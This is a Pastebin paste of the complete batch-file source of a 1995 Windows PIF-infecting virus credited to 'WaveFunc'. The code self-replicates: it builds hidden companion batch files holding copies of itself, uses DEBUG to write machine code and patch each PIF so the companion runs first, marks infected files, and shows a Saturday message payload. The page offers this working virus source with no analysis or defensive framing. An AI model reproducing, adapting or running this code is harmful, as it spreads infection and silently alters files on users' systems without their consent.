Advertisement
FlyFar

Windows PIF Virus - WaveFunc May 13, 1995 - Source Code

Mar 12th, 2023
1,021
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 3.49 KB | Cybersecurity | 0 0
  1. :: Windows PIF Virus (in batch!)
  2. :: Prog by WaveFunc May 13, 1995
  3. :: (these comments will not replicate)
  4. ::
  5. :: This is a virus that 'infects' PIF files, used by Windows to
  6. :: run DOS programs. It works by creating hidden companion batches
  7. :: containing copies of this then altering the PIF file so that the
  8. :: companion batch runs first. After the companion runs it runs the
  9. :: original host program, the name of which is encoded into the
  10. :: companion. The pif files are marked so that they will not be
  11. :: re-infected. Only PIFs are affected, no changes are made to
  12. :: the infected programs. To 'cure', use PIFEDIT to restore the
  13. :: original filenames then delete the hidden files.
  14. ::
  15. @echo off
  16. :: host filename...
  17. set pifvo=LIST.COM
  18. :: loop dispatcher...
  19. if '%1=='PiFV goto PiFV_%2
  20. :: run the virus!
  21. set _PiFV=
  22. if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
  23. %comspec% /e:5000 /c %0 PiFV go>nul
  24. if exist PiFV! del PiFV!
  25. :: run the host
  26. set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
  27. call %0 PiFV hst
  28. set PiFVo=
  29. set PiFVcl=
  30. :: check for activation...
  31. echo.|date|find /i "sat">nul.PiFV
  32. if errorlevel 1 goto PiFV_end
  33. echo.|time|find "7">nul.PiFV
  34. if errorlevel 1 goto PiFV_msg
  35. set PiFV=echo
  36. cls%_PiFV%
  37. %PiFV%.
  38. %PiFV% There once was an Otter named Oscer
  39. %PiFV% Who claimed to know how to make water.
  40. %PiFV% "No more dams," he said, "use my water instead!"
  41. %PiFV% But the Elder Otter was not impressed.
  42. pause>nul.PiFV
  43. set PiFV=
  44. goto PiFV_end
  45. :PiFV_msg
  46. echo [PiFV] by WaveFunc
  47. goto PiFV_end
  48. :PiFV_hst
  49. %PiFVo% %PiFVcl%
  50. goto PiFV_end
  51. :PiFV_go
  52. set PiFVh=%0
  53. if not exist %PiFVh% set PiFVh=%0.bat
  54. if not exist %PiFVh% exit
  55. for %%a in (*.pif) do call %0 PiFV inf %%a
  56. exit PiFV
  57. :PiFV_inf
  58. set PiFVp=%3
  59. :: get victim filename and infection marker
  60. :: from PIF file using debug...
  61. if exist PiFV! goto PiFV_1
  62. echo m 124,162 524>PiFV!
  63. echo e 100 '@set fn='>>PiFV!
  64. echo m 524,562 108>>PiFV!
  65. echo n pifv$.bat>>PiFV!
  66. echo rcx>>PiFV!
  67. echo 47>>PiFV!
  68. echo w>>PiFV!
  69. echo m 55E,561 108>>PiFV!
  70. echo e 10C 0>>PiFV!
  71. echo n pifv$$.bat>>PiFV!
  72. echo rcx>>PiFV!
  73. echo 10>>PiFV!
  74. echo w>>PiFV!
  75. echo q>>PiFV!
  76. :PiFV_1
  77. debug %PiFVp%<PiFV!>nul
  78. call PiFV$
  79. set PiFVn=%fn%
  80. call PiFV$$
  81. set PiFVi=%fn%
  82. del PiFV$?.bat
  83. :: pifvn=orig filename
  84. :: pifvi=infection marker
  85. :: pifvp=pif filename
  86. :: pifvh=companion bat file
  87. :: skip infected or 'empty' pifs...
  88. if '%PiFVi%=='PiFV goto PiFV_end
  89. if '%PiFVn%==' goto PiFV_end
  90. :: don't shadow command.com (be nice)
  91. echo %PiFVn%|find /i "command">nul
  92. if not errorlevel 1 goto PiFV_end
  93. :: infectable - create a companion batch...
  94. :: (the following code strips off the extension)
  95. echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
  96. echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
  97. echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
  98. echo n pifv$.com>>PiFV$$
  99. echo rcx>>PiFV$$
  100. echo 2a>>PiFV$$
  101. echo w>>PiFV$$
  102. echo q>>PiFV$$
  103. debug<PiFV$$>nul
  104. echo %PiFVn%|PiFV$>PiFV$$.bat
  105. call PiFV$$
  106. set PiFVb=%fn%.bat
  107. del PiFV$?.*
  108. :: pifvb=new batch name
  109. :: do not shadow if comp has same name as host
  110. if %PiFVo%==%PiFVb% goto PiFV_end
  111. if exist %PiFVb% goto PiFV_end
  112. echo @echo off>%PiFVb%
  113. echo set pifvo=%pifvn%>>%PiFVb%
  114. find "PiFV"<%PiFVh%>>%PiFVb%
  115. attrib %PiFVb% +h
  116. :: ...and point the PIF at the companion
  117. echo e 15E 'PiFV',0>PiFV$$
  118. echo e 124 '%PiFVb%',0>>PiFV$$
  119. echo w>>PiFV$$
  120. echo q>>PiFV$$
  121. debug %PiFVp%<PiFV$$>nul
  122. del PiFV$$
  123. :: I think we're done!
  124. exit PiFV
  125. :PiFV_end
  126. :: wonder how many bugs all this has in it? Only one
  127. :: way to find out...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement